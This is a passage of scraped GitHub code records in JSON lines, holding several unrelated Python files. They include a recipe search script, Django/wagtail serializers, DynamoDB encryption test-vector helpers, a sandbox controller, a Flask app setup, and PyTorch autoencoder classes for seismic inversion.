data.values()\n        for a, ingredient in enumerate(ingredients_list):\n            print(f\"[{a}] {ingredient}\")\n        try:\n            ingredient_searched = ingredients_list[\n                int(input(\"Pick a number from the ingredient list: \"))\n            ]\n        except ValueError:\n            print(\"Value not a number\")\n        except IndexError:\n            print(\"Value outside the range of ingredients\")\n        else:\n            for recipe in recipes_list:\n                if ingredient_searched in recipe[\"ingredients\"]:\n                    display_recipe(recipe)\n\n    file_name = input(\"Please enter a file name: \")\n    try:\n        with open(file_name, \"rb\") as recipes_file:\n            data = pickle.load(recipes_file)\n    except FileNotFoundError:\n        print(\"File does not exist\")\n    else:\n        search_ingredients(data)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"juanpialvarez/python-specialization","sub_path":"Part 1/1.4/recipes_search.py","file_name":"recipes_search.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"33789328630","text":"dados=[]\narq =open('lista.txt','r')\n\nwhile True:\n    print('== MENU ==')\n    print('== 1 Register ==')\n    print('== 2 List ==')\n    print('3 Remove')\n    opcao=input('Option?')\n\n\n    if opcao=='1':\n\n        dados.append(input('Enter the item:'))\n        print('item added.')\n\n    elif opcao =='2':\n        for item in dados:\n            print('--'*20)\n            print(item)\n            print('--' * 20)\n\n    elif opcao =='3':\n        item=input('item to be removed?')\n        if item in dados:\n            dados.remove(item)\n            print('item removed')\n\n    arq=open(\"lista.txt\",'w')\n    for item in dados:\n        arq.write(item+'\\n')\n\n\n    arq.close()\n\n","repo_name":"davigledson/Programacao-Estruturada-e-Orientada-a-Objetos","sub_path":"Programação Estruturada/aula10-arquivos/ex001.py","file_name":"ex001.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"}
+{"seq_id":"168258812","text":"from functools import lru_cache\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models.constants import LOOKUP_SEP\nfrom treebeard.mp_tree import MP_Node\nfrom wagtail import hooks\nfrom wagtail.models import Page\n\nfrom .field_adapters import adapter_registry\nfrom .models import get_base_model\n\n\ndef _get_subclasses_recurse(model):\n    \"\"\"\n    Given a Model class, find all related objects, exploring children\n    recursively, returning a `list` of strings representing the\n    relations for select_related, adapted from https://github.com/jazzband/django-model-utils/blob/master/model_utils/managers.py\n    \"\"\"\n\n    related_objects = [f for f in model._meta.get_fields() if isinstance(f, models.OneToOneRel)]\n\n    rels = [\n        rel for rel in related_objects\n        if isinstance(rel.field, models.OneToOneField)\n        and issubclass(rel.field.model, model)\n        and model is not rel.field.model\n        and rel.parent_link\n    ]\n\n    subclasses = []\n    for rel in rels:\n        for subclass in _get_subclasses_recurse(rel.field.model):\n            subclasses.append(\n                rel.get_accessor_name() + LOOKUP_SEP + subclass)\n        subclasses.append(rel.get_accessor_name())\n    return subclasses\n\n\ndef _get_sub_obj_recurse(obj, s):\n    \"\"\"\n    Given an object and its potential subclasses in lookup string form,\n    retrieve its most specific subclass recursively\n    Taken from: https://github.com/jazzband/django-model-utils/blob/master/model_utils/managers.py\n    \"\"\"\n    rel, _, s = s.partition(LOOKUP_SEP)\n\n    try:\n        node = getattr(obj, rel)\n    except ObjectDoesNotExist:\n        return None\n    if s:\n        child = 
_get_sub_obj_recurse(node, s)\n return child\n else:\n return node\n\n\ndef get_subclass_instances(instances, subclasses):\n subclass_instances = []\n for obj in instances:\n sub_obj = None\n for s in subclasses:\n sub_obj = _get_sub_obj_recurse(obj, s)\n if sub_obj:\n break\n if not sub_obj:\n sub_obj = obj\n subclass_instances.append(sub_obj)\n return subclass_instances\n\n\nclass ModelSerializer:\n ignored_fields = []\n\n def __init__(self, model):\n self.model = model\n self.base_model = get_base_model(model)\n\n field_adapters = []\n adapter_managed_fields = []\n for field in self.model._meta.get_fields():\n if field.name in self.ignored_fields:\n continue\n\n # ignore primary keys (including MTI parent pointers)\n if getattr(field, 'primary_key', False):\n continue\n\n adapter = adapter_registry.get_field_adapter(field)\n\n if adapter:\n adapter_managed_fields = adapter_managed_fields + adapter.get_managed_fields()\n field_adapters.append(adapter)\n\n self.field_adapters = [adapter for adapter in field_adapters if adapter.name not in adapter_managed_fields]\n\n def get_objects_by_ids(self, ids):\n \"\"\"\n Given a list of IDs, return a list of model instances that we can\n run serialize and get_object_references on, fetching the specific subclasses\n if using multi table inheritance as appropriate\n \"\"\"\n base_queryset = self.model.objects.filter(pk__in=ids)\n subclasses = _get_subclasses_recurse(self.model)\n return get_subclass_instances(base_queryset, subclasses)\n\n def serialize_fields(self, instance):\n return {\n field_adapter.name: field_adapter.serialize(instance)\n for field_adapter in self.field_adapters\n }\n\n def serialize(self, instance):\n return {\n 'model': self.model._meta.label_lower,\n 'pk': instance.pk,\n 'fields': self.serialize_fields(instance)\n }\n\n def get_object_references(self, instance):\n refs = {\n # always include the primary key as an object reference\n (self.base_model, instance.pk)\n }\n for f in self.field_adapters:\n refs.update(f.get_object_references(instance))\n return refs\n\n def get_objects_to_serialize(self, instance):\n objects = set()\n for f in self.field_adapters:\n objects.update(f.get_objects_to_serialize(instance))\n return objects\n\n\nclass TreeModelSerializer(ModelSerializer):\n ignored_fields = ['path', 'depth', 'numchild']\n\n def serialize(self, instance):\n result = super().serialize(instance)\n if instance.is_root():\n result['parent_id'] = None\n else:\n result['parent_id'] = instance.get_parent().pk\n\n return result\n\n def get_object_references(self, instance):\n refs = super().get_object_references(instance)\n if not instance.is_root():\n # add a reference for the parent ID\n refs.add(\n (self.base_model, instance.get_parent().pk)\n )\n return refs\n\n\nclass PageSerializer(TreeModelSerializer):\n ignored_fields = TreeModelSerializer.ignored_fields + [\n 'url_path', 'content_type', 'draft_title', 'has_unpublished_changes', 'owner',\n 'go_live_at', 'expire_at', 'expired', 'locked', 'first_published_at', 'last_published_at',\n 'latest_revision_created_at', 'live_revision',\n ]\n\n def get_objects_by_ids(self, ids):\n # serialize method needs the instance in its specific form\n return self.model.objects.filter(pk__in=ids).specific()\n\n\nclass SerializerRegistry:\n BASE_SERIALIZERS_BY_MODEL_CLASS = {\n models.Model: ModelSerializer,\n MP_Node: TreeModelSerializer,\n Page: PageSerializer,\n }\n\n def __init__(self):\n self._scanned_for_serializers = False\n self.serializers_by_model_class = {}\n\n def 
_scan_for_serializers(self):\n serializers = dict(self.BASE_SERIALIZERS_BY_MODEL_CLASS)\n\n for fn in hooks.get_hooks('register_custom_serializers'):\n serializers.update(fn())\n\n self.serializers_by_model_class = serializers\n self._scanned_for_serializers = True\n\n @lru_cache(maxsize=None)\n def get_model_serializer(self, model):\n # find the serializer class for the most specific class in the model's inheritance tree\n\n if not self._scanned_for_serializers:\n self._scan_for_serializers()\n\n for cls in model.__mro__:\n if cls in self.serializers_by_model_class:\n serializer_class = self.serializers_by_model_class[cls]\n return serializer_class(model)\n\n\nserializer_registry = SerializerRegistry()\n","repo_name":"wagtail/wagtail-transfer","sub_path":"wagtail_transfer/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"72"} +{"seq_id":"16550530790","text":"import random\n\ndef Merge(A, i, j, m):\n for k in A[i : m]:\n while m < j and k > A[m]:\n A[i] = A[m]\n i = i + 1\n m = m + 1\n A[i] = k\n i = i + 1\n\ndef MergeSortSlice(A, i, j):\n if j - i > 1:\n m = (i + j) // 2\n MergeSortSlice(A, i, m)\n MergeSortSlice(A, m, j)\n Merge(A, i, j, m)\n \ndef MergeSort(A):\n MergeSortSlice(A, 0, len(A))\n\nA = []\nfor i in range(12):\n A.append(random.randint(-20, 20))\n\nprint(A) \nMergeSort(A)\nprint(A)\n\n","repo_name":"Vibulan/sortingPython","sub_path":"MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14404567234","text":"import base64\nimport codecs\nimport json\nimport os\nfrom decimal import Decimal\n\nfrom boto3.dynamodb.types import Binary\n\nfrom dynamodb_encryption_sdk.identifiers import CryptoAction\nfrom dynamodb_encryption_sdk.structures import AttributeActions\n\n_ATTRIBUTE_TEST_VECTOR_FILE_TEMPLATE = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), \"..\", \"vectors\", \"{mode}_attribute.json\"\n)\n_MATERIAL_DESCRIPTION_TEST_VECTORS_FILE = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), \"..\", \"vectors\", \"material_description.json\"\n)\n_STRING_TO_SIGN_TEST_VECTORS_FILE = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), \"..\", \"vectors\", \"string_to_sign.json\"\n)\n\n\ndef decode_value(value, transform_binary=False): # noqa: C901\n def _decode_string(_value):\n return _value\n\n def _decode_number(_value):\n return \"{0:f}\".format(Decimal(_value))\n\n def _decode_binary(_value):\n raw = base64.b64decode(_value)\n if transform_binary:\n return Binary(raw)\n return raw\n\n def _binary_sort_key(x):\n if transform_binary:\n return x.value\n return x\n\n def _passthrough_sort_key(x):\n return x\n\n def _decode_set(_value, member_decode, key_func=_passthrough_sort_key):\n decoded_members = []\n for member in _value:\n decoded_members.append(member_decode(member))\n return sorted(decoded_members, key=key_func)\n\n def _decode_binary_set(_value):\n return _decode_set(_value, _decode_binary, _binary_sort_key)\n\n def _decode_string_set(_value):\n return _decode_set(_value, _decode_string)\n\n def _decode_number_set(_value):\n return _decode_set(_value, _decode_number)\n\n def _decode_list(_value):\n decoded_members = []\n for member in _value:\n decoded_members.append(_decode_complex_value(member))\n return decoded_members\n\n def _decode_map(_value):\n decoded_value = {}\n for 
member_key, member_value in _value.items():\n decoded_value[member_key] = _decode_complex_value(member_value)\n return decoded_value\n\n _decode_mapping = {\n \"S\": _decode_string,\n \"B\": _decode_binary,\n \"SS\": _decode_string_set,\n \"BS\": _decode_binary_set,\n \"L\": _decode_list,\n \"M\": _decode_map,\n \"N\": _decode_number,\n \"NS\": _decode_number_set,\n }\n\n def _decode_complex_value(_value):\n key, item = list(_value.items())[0]\n transform = _decode_mapping.get(key, None)\n if transform is None:\n return {key: item}\n return {key: transform(item)}\n\n return _decode_complex_value(value)\n\n\ndef attribute_test_vectors(mode):\n filepath = _ATTRIBUTE_TEST_VECTOR_FILE_TEMPLATE.format(mode=mode)\n with open(filepath, encoding=\"utf-8\") as f:\n vectors = json.load(f)\n for vector in vectors:\n yield (decode_value(vector[\"attribute\"]), base64.b64decode(codecs.encode(vector[\"serialized\"], \"utf-8\")))\n\n\ndef material_description_test_vectors():\n with open(_MATERIAL_DESCRIPTION_TEST_VECTORS_FILE, encoding=\"utf-8\") as f:\n vectors = json.load(f)\n for vector in vectors:\n yield (vector[\"material_description\"], decode_value({\"B\": codecs.encode(vector[\"serialized\"], \"utf-8\")}))\n\n\nACTION_MAP = {\n \"encrypt\": CryptoAction.ENCRYPT_AND_SIGN,\n \"sign\": CryptoAction.SIGN_ONLY,\n \"nothing\": CryptoAction.DO_NOTHING,\n}\n\n\ndef string_to_sign_test_vectors():\n with open(_STRING_TO_SIGN_TEST_VECTORS_FILE, encoding=\"utf-8\") as f:\n vectors = json.load(f)\n for vector in vectors:\n item = {key: decode_value(value[\"value\"]) for key, value in vector[\"item\"].items()}\n bare_actions = {key: ACTION_MAP[value[\"action\"]] for key, value in vector[\"item\"].items()}\n attribute_actions = AttributeActions(default_action=CryptoAction.DO_NOTHING, attribute_actions=bare_actions)\n yield (\n item,\n vector[\"table\"],\n attribute_actions,\n base64.b64decode(codecs.encode(vector[\"string_to_sign\"], \"utf-8\")),\n )\n","repo_name":"aws/aws-dynamodb-encryption-python","sub_path":"test/functional/functional_test_vector_generators.py","file_name":"functional_test_vector_generators.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"72"} +{"seq_id":"71120568232","text":"#!/usr/bin/env python3.7\nfrom flask import Flask\nfrom flask_socketio import SocketIO\nfrom flask_login import LoginManager\n\napp = Flask(__name__)\napp.config['CORS_HEADERS'] = 'Content-Type'\napp.config['ENV'] = 'development'\napp.secret_key = \"any random string\"\nsocketio = SocketIO(app)\nlogin = LoginManager(app)\nlogin.login_view = 'user_routes.login'","repo_name":"bjellesma/chatchord","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38517762117","text":"from string import ascii_uppercase as compound_names\nfrom enum import Enum\n\nclass EffectType(Enum):\n\tRESTORE = 1\n\tDEPLETE = 2\n\tBUFF = 3\n\tDEBUFF = 4\n\nclass Effect():\n\tdef __init__(self, stat, signature, effecttype):\n\t\tself.stat = stat\n\t\t'''\n\t\tEach effect's signature is 3 compounds (names), \n\t\tand implies equal amounts of each. 
Basically a bit-\n\t\tvector with exactly three 1's.\n\n\t\tEffects that have only compounds that occur in nature means\n\t\teating raw ingredients can potentially yield that effect\n\t\twith high potency.\n\t\t'''\n\t\tself.signature = signature\n\t\tself.vector = self.effectvector()\n\t\tself.effecttype = effecttype\n\n\tdef effectvector(self):\n\t\tresult = [1 if i in self.signature else 0 \\\n\t\t\tfor i in compound_names]\n\t\treturn result\n\nalleffects = {\n\t'+hp' : Effect('hp', \t\t\t\t['A', 'D', 'M'],\n\t\tEffectType.RESTORE),\n\t'+speed' : Effect('speed', \t\t\t['C', 'O', 'S'],\n\t\tEffectType.BUFF),\n\t'+defense' : Effect('defense', \t\t['J', 'M', 'T'],\n\t\tEffectType.BUFF),\n\t'+spdefense' : Effect('spdefense', \t['E', 'G', 'N'],\n\t\tEffectType.BUFF),\n\t'+attack' : Effect('attack', \t\t['B', 'F', 'W'],\n\t\tEffectType.BUFF),\n\t'+spattack' : Effect('spattack', \t['E', 'K', 'X'],\n\t\tEffectType.BUFF),\n\t'+heat' : Effect('heat', \t\t\t['C', 'U', 'V'],\n\t\tEffectType.BUFF),\n\n\t'-hp' : Effect('hp', \t\t\t\t['F', 'H', 'P'],\n\t\tEffectType.DEPLETE),\n\t'-speed' : Effect('speed', \t\t\t['D', 'I', 'N'],\n\t\tEffectType.DEBUFF),\n\t'-defense' : Effect('defense', \t\t['I', 'O', 'W'],\n\t\tEffectType.DEBUFF),\n\t'-spdefense' : Effect('spdefense', \t['J', 'R', 'T'],\n\t\tEffectType.DEBUFF),\n\t'-attack' : Effect('attack', \t\t['H', 'K', 'S'],\n\t\tEffectType.DEBUFF),\n\t'-spattack' : Effect('spattack', \t['D', 'G', 'P'],\n\t\tEffectType.DEBUFF),\n\t'-heat' : Effect('heat', \t\t\t['B', 'Q', 'X'],\n\t\tEffectType.DEBUFF),\n\t\n\t'invis' : Effect('invisibility', \t['L', 'V', 'X'],\n\t\tEffectType.BUFF)\n}\n\t","repo_name":"mkdir-not-war/alchemy-demo","sub_path":"effects.py","file_name":"effects.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23776812381","text":"'''\nSwap Nodes in Pairs\n\nGiven a linked list, swap every two adjacent nodes and return its head.\n\n \n\nExample 1:\n\nInput: head = [1,2,3,4]\nOutput: [2,1,4,3]\n\nExample 2:\n\nInput: head = []\nOutput: []\n\nExample 3:\n\nInput: head = [1]\nOutput: [1]\n\n \n\nConstraints:\n\n The number of nodes in the list is in the range [0, 100].\n 0 <= Node.val <= 100\n\n \nFollow up: Can you solve the problem without modifying the values in the list's nodes? 
(i.e., Only nodes themselves may be changed.)\n'''\n\n# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\nclass Solution:\n    def swapPairs(self, head: ListNode) -> ListNode:\n        if head and head.next:\n            next_start = head.next.next\n            head.next.next = head\n            head = head.next\n        else:\n            return head\n        head.next.next = self.swapPairs(next_start)\n        return head\n\n#from leetcode\nclass Solution(object):\n    def swapPairs(self, head):\n        if not head or not head.next: return head\n        new_start = head.next.next\n        head, head.next = head.next, head\n        head.next.next = self.swapPairs(new_start)\n        return head\n\n#from leetcode\nclass Solution(object):\n    def swapPairs(self, head):\n        if not head or not head.next:\n            return head\n        second = head.next\n        head.next = self.swapPairs(second.next)\n        second.next = head\n        return second\n\ndef build_ll(head):\n    if not head: return head\n    start = ListNode(head[0])\n    curr = start\n    for i in range(1, len(head)):\n        curr.next = ListNode(head[i])\n        curr = curr.next\n    return start\n\ndef print_ll(head):\n    curr = head\n    ref = []\n    while curr:\n        ref.append(curr)\n        print(curr.val, sep=\"==>\", end=\" \")\n        curr = curr.next\n    return ref\n\nhead = [1,2,3,4]\n# Output: [2,1,4,3]\nhead = []\n# Output: []\nhead = [1]\n# Output: [1]\nprint('Input = {}'.format(head))\nstart = build_ll(head)\nprint('LL')\nref = print_ll(start)\nprint(ref)\nprint()\ns = Solution()\nswapped = s.swapPairs(start)\nprint('After pair swap')\nswap_ref = print_ll(swapped)\nprint(swap_ref)\nprint()\n","repo_name":"jomesh18/Leetcode","sub_path":"Recursion/swap_pairs_ll.py","file_name":"swap_pairs_ll.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"570507774","text":"\nimport traceback\n\nimport dill\nfrom insights_sandbox.protocol import Commands, Error, Okay, Results\n\n\nclass Controller:\n    \"\"\"\n    Drives a state machine that controls a ``Runner`` via the\n    setup and process methods of a ``RunnerAdapter``.\n\n    Arguments:\n        setup (function): Function that handles the SETUP command's payload.\n        process (function): Function that handles archive processing.\n        send (function): Used to send Responses.\n        recv (function): Used to get commands with their payloads.\n\n    \"\"\"\n\n    def __init__(self, setup, process, send, recv):\n        self.handlers = {\n            \"starting\": Starting(self, setup),\n            \"processing\": Processing(self, process),\n        }\n        self._send = send\n        self._recv = recv\n        self._state = \"starting\"\n\n    def run(self):\n        # Let the sender know we're ready.\n        self.send(Okay())\n        while self._state != \"stopping\":\n            cmd, payload = self.recv()\n            result = self.handlers[self._state].run(cmd, payload)\n            self.send(result)\n        self._state = \"stopped\"\n\n    def send(self, msg):\n        if msg is not None:\n            code, payload = msg\n            self._send([code, dill.dumps(payload)])\n\n    def recv(self):\n        cmd, payload = self._recv()\n        return cmd, dill.loads(payload)\n\n    def transition_to(self, state):\n        self._state = state\n\n\nclass State:\n    def __init__(self, controller, action):\n        self._controller = controller\n        self._action = action\n\n    def run(self, cmd, payload):\n        if cmd == Commands.STOP:\n            self.transition_to(\"stopping\")\n            return Okay()\n\n        try:\n            return self.handle(cmd, payload)\n        except Exception:\n            self.transition_to(\"stopping\")\n            return Error(traceback.format_exc())\n\n    def handle(self, cmd, payload):\n        raise NotImplementedError()\n\n    def transition_to(self, 
state):\n self._controller.transition_to(state)\n\n\nclass Starting(State):\n def handle(self, cmd, payload):\n if cmd == Commands.SETUP:\n self._action(payload)\n self.transition_to(\"processing\")\n return Okay()\n\n raise Exception(\"Invalid Command.\")\n\n\nclass Processing(State):\n def handle(self, cmd, payload):\n if cmd == Commands.PROCESS:\n return Results(self._action(payload))\n\n raise Exception(\"Invalid Command\")\n","repo_name":"RedHatInsights/insights-sandbox","sub_path":"insights_sandbox/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4503263661","text":"from numpy.random import seed\n\nseed(1)\nimport os\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras.optimizers import RMSprop, Adam, SGD\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.models import load_model\nimport numpy as np\nimport pandas as pd\nfrom sklearn import svm, metrics, datasets\nimport pickle\n\nbase_dir = os.path.join(os.path.dirname(__file__), '../data')\ntrain_dir = os.path.join(base_dir, 'train')\nvalidation_dir = os.path.join(base_dir, 'validation')\ntest_dir = os.path.join(base_dir, 'test')\n\n# Directory with our training class1 pictures\ntrain_blank_dir = os.path.join(train_dir, 'Blank')\n\n# Directory with our training class2 pictures\ntrain_cancel_dir = os.path.join(train_dir, 'Cancelled')\n\n# Directory with our training class3 pictures\ntrain_hand_dir = os.path.join(train_dir, 'Handwritten')\n\n# Directory with our training class4 pictures\ntrain_print_dir = os.path.join(train_dir, 'Printed')\n\n# Directory with our validation class1 pictures\nvalidation_blank_dir = os.path.join(validation_dir, 'Blank')\n\n# Directory with our validation class2 pictures\nvalidation_cancel_dir = os.path.join(validation_dir, 'Cancelled')\n\n# Directory with our validation class3 pictures\nvalidation_hand_dir = os.path.join(validation_dir, 'Handwritten')\n\n# Directory with our validation class4 pictures\nvalidation_print_dir = os.path.join(validation_dir, 'Printed')\n\n# Directory with our test pictures\ntest_class_dir = os.path.join(test_dir, 'allclasses')\n\n'''\n# get shape of feature matrix\nprint('Feature matrix shape is: ', X_train.shape)\n\n# define standard scaler\nss = StandardScaler()\n# run this on our feature matrix\nbees_stand = ss.fit_transform(X_train)\n\npca = PCA(n_components=500)\n# use fit_transform to run PCA on our standardized matrix\nbees_pca = ss.fit_transform(bees_stand)\n# look at new shape\nprint('PCA matrix shape is: ', bees_pca.shape)\n'''\n\n\ntrain_test_filename = \"../data_kfold/dll_{}.pkl\"\nfor k_fold in [0,1,2]:\n print(\"k-fold number : {}\".format(k_fold))\n with open(train_test_filename.format(k_fold), 'rb') as file:\n pickle_model = pickle.load(file)\n X_train = pickle_model.get('X_tr')\n Y_train = pickle_model.get('y_tr')\n X_val = pickle_model.get('X_te')\n Y_val = pickle_model.get('y_te')\n print((X_train.shape,Y_train.shape),(X_val.shape,Y_val.shape))\n \n for each_model_k in [0,1,2]:\n model = load_model('../model/mdl_wts_{}.hdf5'.format(each_model_k))\n\n pred = model.predict(X_val)\n Y_pred = np.argmax(pred, axis=1)\n Y_val_num = np.argmax(Y_val, axis=1)\n print(\"Classification report for - \\nval_data--{} & model_k--{}:\\n{}\\n\".format(k_fold, each_model_k, 
metrics.classification_report(Y_val_num, Y_pred)))","repo_name":"munaAchyuta/image_classification","sub_path":"kfold_DL_test.py","file_name":"kfold_DL_test.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"25507119904","text":"import torch.nn as nn\nimport torch\nfrom utils import *\n\n# from torchfwi import Fwi\n# from PyFWI.torchfwi import Fwi\n\n\nclass SubBlock(nn.Module):\n    def __init__(self, in_channels, out_channels, stride):\n        super(SubBlock, self).__init__()\n        self.conv = nn.Sequential(\n            nn.Conv2d(in_channels=in_channels, out_channels=out_channels,\n                      kernel_size=3, stride=stride, padding=1,\n                      bias=True,\n                      # padding_mode=\"reflect\" # Helps to reduce the artifacts\n                      ),\n            nn.BatchNorm2d(out_channels),\n            nn.LeakyReLU(0.2)\n        )\n    def forward(self, x):\n        return self.conv(x)\n    \n    \nclass Block(nn.Module):\n    def __init__(self, in_channels, out_channels, stride, operation, final_shape=None):\n        super(Block, self).__init__()\n        layers = [\n            SubBlock(in_channels=in_channels,\n                     out_channels=out_channels,\n                     stride=stride),\n            SubBlock(in_channels=out_channels,\n                     out_channels=out_channels,\n                     stride=stride)\n        ]\n        if operation == \"down\":\n            layers.append(\n                nn.MaxPool2d(kernel_size=2)\n            )\n        elif operation == \"up\":\n            if not final_shape:\n                layers.append(\n                    nn.Upsample(scale_factor=2, mode=\"bilinear\")\n                )\n            else:\n                layers.append(\n                    nn.Upsample(final_shape, mode=\"bilinear\")\n                )\n        \n        self.layers = nn.Sequential(*layers)\n    \n    def forward(self, x):\n        out = self.layers(x)\n        return out\n    \n    \nclass Encoder(nn.Module):\n    def __init__(self, batch_size, in_channels,\n                 n_blocks, nt, nr,\n                 final_size):\n        super(Encoder, self).__init__()\n        self.nr = nr\n        self.nt = nt\n        \n        self.batch_size = batch_size\n        \n        layers = []\n        self.out_channels = [2 ** i for i in range(n_blocks + 1)]\n        # print(self.out_channels)\n        \n        for layer_idx in range(n_blocks):\n            layers.append(\n                Block(in_channels=self.out_channels[layer_idx] * in_channels,\n                      out_channels=self.out_channels[layer_idx + 1] * in_channels,\n                      stride=1, operation=\"down\"\n                      )\n            )\n        self.conv_layers = nn.Sequential(*layers)\n        \n        self._set_fc_in_features(in_channels)\n        # print(fc_in_features, final_size) \n        # Fully connected layer is used to bring the results of conv layers to\n        # an appropriate size for upscaling. 
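\n        # Worked example of the sizing in _set_fc_in_features below (illustrative\n        # numbers, not from this file): with batch_size=1, in_channels=1 and n_blocks=3,\n        # out_channels[-1] = 8, so for nt = 2617 and nr = 64:\n        # fc_in_features = 1*1*8*(2617//8)*(64//8) = 8*327*8 = 20928.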
\n self.final_size = final_size\n \n self.final = nn.Sequential(\n nn.Linear(\n in_features=self.fc_in_features, \n out_features=self.final_size \n )\n )\n \n def _set_fc_in_features(self, in_channels):\n self.fc_in_features =self.batch_size * in_channels * self.out_channels[-1] \\\n * torch.div(self.nt, self.out_channels[-1], rounding_mode=\"floor\")\\\n * torch.div(self.nr, self.out_channels[-1], rounding_mode=\"floor\")\n \n def _reshape_input(self, in_channels:int):\n input_layer = self.conv_layers[0].layers[0].conv[0] \n stride = input_layer.stride\n out_channels = input_layer.out_channels\n \n # self._set_fc_in_features(in_channels)\n old_block = self.conv_layers[0].layers[0].conv[0]\n if old_block.in_channels == in_channels:\n pass\n else:\n self.conv_layers[0].layers[0].conv[0] = \\\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels,\n kernel_size=3, stride=stride, padding=1,\n bias=True,\n )\n self.conv_layers[0].layers[0].conv[0].bias = nn.Parameter(old_block.bias)\n if old_block.in_channels > in_channels:\n self.conv_layers[0].layers[0].conv[0].weight = nn.Parameter(old_block.weight[:,:in_channels, ...])\n \n else:\n self.conv_layers[0].layers[0].conv[0].weight[:, :in_channels, ...] = nn.Parameter(old_block.weight)\n \n def _reshape_final(self, \n fc_in_features: int,\n final_size: int):\n old_in_features = self.final[0].in_features\n if old_in_features == fc_in_features:\n pass\n else:\n self.final = nn.Sequential(\n nn.Linear(\n in_features=fc_in_features, \n out_features=final_size \n )\n )\n \n \n def forward(self, x):\n out = self.conv_layers(x)\n # out = nn.Flatten()(out)\n out = out.view(-1)\n # print(out.shape)\n out = self.final(out)\n \n return out\n \n \nclass Decoder(nn.Module):\n def __init__(self, batch_size,\n initial_shape: Tuple, \n final_shape: Tuple,\n n_blocks,\n m_min, m_max,\n final_out_channels=1\n ):\n \n super(Decoder, self).__init__() \n #Shape to reconstruct output of the encoder\n self._set_initial_shape(initial_shape) \n self.batch_size = batch_size\n self.m_max = m_max\n self.m_min = m_min\n finalize = None\n \n layers = []\n self.out_channels = [2 ** i for i in range(n_blocks + 1)]\n \n for layer_idx in range(n_blocks):\n finalize = final_shape if layer_idx== n_blocks-1 else None\n \n layers.append(\n Block(in_channels=self.out_channels[layer_idx],\n out_channels=self.out_channels[layer_idx + 1],\n stride=1, operation=\"up\",\n final_shape=finalize\n )\n )\n \n self.conv_layers = nn.Sequential(*layers)\n self.final = nn.Sequential(\n nn.Conv2d(in_channels=self.out_channels[-1],\n out_channels=final_out_channels, \n kernel_size=3, padding=1, stride=1,\n bias=True\n ),\n nn.Sigmoid(),\n \n )\n\n def _set_initial_shape(self, initial_shape_decoder: Tuple):\n self.initial_shape = initial_shape_decoder\n \n def _set_finale_shape(self, final_shape_decoder: Tuple):\n self.conv_layers[-1].layers[2].size = final_shape_decoder\n \n def forward(self, x):\n x = x.reshape(self.batch_size, 1, self.initial_shape[0], self.initial_shape[1])\n out = self.conv_layers(x)\n out = self.final(out)\n out = self.m_min + out * (self.m_max - self.m_min)\n return out\n \n\nclass Autoencoder(nn.Module):\n def __init__(self, batch_size, in_channels,\n n_blocks_encoder, n_blocks_decoder,\n final_size_encoder, initial_shape_decoder,\n nt, nr, final_spatial_shape,\n m_min, m_max,\n final_out_channels=1 \n ):\n super(Autoencoder, self).__init__()\n self.encoder = Encoder(batch_size=batch_size, in_channels=in_channels,\n n_blocks=n_blocks_encoder, \n nt=nt, nr=nr, 
final_size=final_size_encoder)\n self.decoder = Decoder(batch_size=batch_size, initial_shape=initial_shape_decoder,\n final_shape=final_spatial_shape, n_blocks=n_blocks_decoder, \n m_min=m_min, m_max=m_max, \n final_out_channels=final_out_channels)\n \n def _reshape_encoder(self, trained_encoder, d_obs: torch.Tensor):\n new_in_channels: int = d_obs.shape[1]\n \n final_size_encoder = self.encoder.final_size\n \n self.encoder = trained_encoder\n self.encoder._reshape_input(in_channels=new_in_channels)\n\n a = self.encoder.conv_layers(d_obs)\n self.encoder._reshape_final(fc_in_features=a.view(-1).shape[0],\n final_size=final_size_encoder)\n \n def _reshape_decoder(self, trained_decoder, \n decoder_initial_shape: Tuple,\n decoder_final_shape: Tuple):\n \n self.decoder = trained_decoder\n self.decoder._set_initial_shape(decoder_initial_shape)\n self.decoder._set_finale_shape(decoder_final_shape)\n \n def reshape(self, trained_autoencoder,\n d_obs: torch.Tensor,\n decoder_initial_shape: Tuple,\n decoder_final_shape: Tuple\n ):\n self._reshape_encoder(\n trained_autoencoder.encoder,\n d_obs=d_obs)\n \n self._reshape_decoder(\n trained_autoencoder.decoder,\n decoder_initial_shape=decoder_initial_shape,\n decoder_final_shape=decoder_final_shape\n )\n\n \n def forward(self, x):\n out = self.encoder(x)\n out = self.decoder(out)\n return out\n \n\nclass Physics_deepwave(nn.Module):\n def __init__(self, dh, dt, src,\n src_loc, rec_loc, rp_properties=None):\n 